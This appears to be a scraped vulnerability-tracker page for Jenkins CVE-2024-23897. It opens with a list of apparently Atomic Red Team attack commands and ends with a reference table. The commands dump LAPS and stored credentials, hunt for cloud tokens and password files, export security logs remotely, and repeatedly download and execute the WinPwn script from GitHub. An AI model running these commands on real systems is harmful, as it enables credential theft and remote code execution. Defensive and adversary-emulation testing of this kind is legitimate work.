& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23897 |
| jenkins.io |
GitHub CVE
vendor-advisory
|
https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 |
| sonarsource.com |
GitHub CVE
|
https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ |
| openwall.com |
GitHub CVE
|
http://www.openwall.com/lists/oss-security/2024/01/24/6 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html |
| vicarius.io |
NVD API
Exploit
Third Party Advisory
|
https://www.vicarius.io/vsociety/posts/the-anatomy-of-a-jenkins-vulnerability-cve-2024-23897-revealed-1 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23897 |